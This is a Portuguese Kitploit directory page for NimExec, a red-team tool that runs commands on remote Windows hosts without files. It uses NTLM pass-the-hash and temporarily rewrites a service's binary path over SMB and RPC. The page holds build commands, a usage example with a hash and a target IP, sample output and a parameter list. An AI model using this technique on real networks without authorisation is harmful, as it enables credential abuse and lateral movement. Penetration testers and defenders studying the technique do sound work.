Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/frkngksl/nimexec
ExploraçãoMovimento LateralTestes de PenetraçãoComando e ControleRed Teaming
GitHubfrkngksl/nimexec

NimExec

Execução de Comandos sem Arquivo para Movimento Lateral em Nim

Ver Repositório
39440há 4 mesesRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

NimExec

Basicamente, o NimExec é uma ferramenta de execução remota de comandos sem arquivos que usa o Protocolo Remoto do Gerenciador de Controle de Serviços (MS-SCMR). Ele altera o caminho binário de um serviço aleatório ou fornecido executado pelo LocalSystem para executar o comando fornecido no alvo e o restaura posteriormente por meio de pacotes RPC artesanais em vez de chamadas WinAPI. Ele envia esses pacotes via SMB2 e o pipe nomeado svcctl.

O NimExec precisa de um hash NTLM para autenticar na máquina alvo e então completa este processo de autenticação com o método de Autenticação NTLM através de pacotes artesanais.

Como todos os pacotes de rede necessários são feitos manualmente e nenhuma função específica do sistema operacional é usada, o NimExec pode ser usado em diferentes sistemas operacionais usando o suporte de compilação cruzada do Nim.

Este projeto foi inspirado na ferramenta SharpNoPSExec do Julio. Você pode pensar que o NimExec é uma versão com compilação cruzada e suporte embutido a Pass the Hash do SharpNoPSExec. Além disso, aprendi as estruturas de pacotes de rede necessárias a partir do Script Invoke-SMBExec do Kevin Robertson.

Compilação

root@kitploit:~
nim c -d:release --gc:markAndSweep -o:NimExec.exe Main.nim

O comando acima utiliza um Garbage Collector diferente porque o coletor de lixo padrão do Nim está gerando alguns erros SIGSEGV durante o processo de busca de serviços.

Além disso, você pode instalar os módulos Nim necessários via Nimble com o seguinte comando:

root@kitploit:~
nimble install ptr_math nimcrypto hostname

Uso

root@kitploit:~
test@ubuntu:~/Desktop/NimExec$ ./NimExec -u testuser -d TESTLABS -h 123abcbde966780cef8d9ec24523acac -t 10.200.2.2 -c 'cmd.exe /c "echo test > C:\Users\Public\test.txt"' -v
 
                                                                                             _..._     
                                                                                          .-'_..._''.  
   _..._   .--. __  __   ___         __.....__                          __.....__       .' .'      '.\ 
 .'     '. |__||  |/  `.'   `.   .-''         '.                    .-''         '.    / .'            
.   .-.   ..--.|   .-.  .-.   ' /     .-''"'-.  `.                 /     .-''"'-.  `. . '              
|  '   '  ||  ||  |  |  |  |  |/     /________\   \ ____     _____/     /________\   \| |              
|  |   |  ||  ||  |  |  |  |  ||                  |`.   \  .'    /|                  || |              
|  |   |  ||  ||  |  |  |  |  |\    .-------------'  `.  `'    .' \    .-------------'. '              
|  |   |  ||  ||  |  |  |  |  | \    '-.____...---.    '.    .'    \    '-.____...---. \ '.          . 
|  |   |  ||__||__|  |__|  |__|  `.             .'     .'     `.    `.             .'   '. `._____.-'/ 
|  |   |  |                        `''-...... -'     .'  .'`.   `.    `''-...... -'       `-.______ /  
|  |   |  |                                        .'   /    `.   `.                               `   
'--'   '--'                                       '----'       '----'                                  

                                            @R0h1rr1m          


[+] Connected to 10.200.2.2:445
[+] NTLM Authentication with Hash is succesfull!
[+] Connected to IPC Share of target!
[+] Opened a handle for svcctl pipe!
[+] Bound to the RPC Interface!
[+] RPC Binding is acknowledged!
[+] SCManager handle is obtained!
[+] Number of obtained services: 265
[+] Selected service is LxpSvc
[+] Service: LxpSvc is opened!
[+] Previous Service Path is: C:\Windows\system32\svchost.exe -k netsvcs
[+] Service config is changed!
[!] StartServiceW Return Value: 1053 (ERROR_SERVICE_REQUEST_TIMEOUT)
[+] Service start request is sent!
[+] Service config is restored!
[+] Service handle is closed!
[+] Service Manager handle is closed!
[+] SMB is closed!
[+] Tree is disconnected!
[+] Session logoff!

Foi testado contra Windows 10 e 11, Windows Server 16, 19 e 22 a partir de máquinas Ubuntu 20.04 e Windows 10.

Parâmetros de Linha de Comando

root@kitploit:~
    -v | --verbose                          Enable more verbose output.
    -u | --username <Username>              Username for NTLM Authentication.*
    -h | --hash <NTLM Hash>                 NTLM password hash for NTLM Authentication.**
    -p | --password <Password>              Plaintext password.**
    -t | --target <Target>                  Lateral movement target.*
    -c | --command <Command>                Command to execute.*
    -d | --domain <Domain>                  Domain name for NTLM Authentication.
    -s | --service <Service Name>           Name of the service instead of a random one.
    --help                                  Show the help message.

Referências

  • https://github.com/juliourena/SharpNoPSExec
  • https://github.com/Kevin-Robertson/Invoke-TheHash/blob/master/Invoke-SMBExec.ps1
  • https://winprotocoldoc.blob.core.windows.net/productionwindowsarchives/MS-SCMR/%5bMS-SCMR%5d.pdf
  • https://github.com/jborean93/pypsexec/tree/master
  • https://www.x86matthew.com/view_post?id=create_svc_rpc

Aviso Legal

Apenas para testes de segurança autorizados. O uso indevido desta ferramenta contra sistemas sem permissão explícita é ilegal.

Baixar ferramenta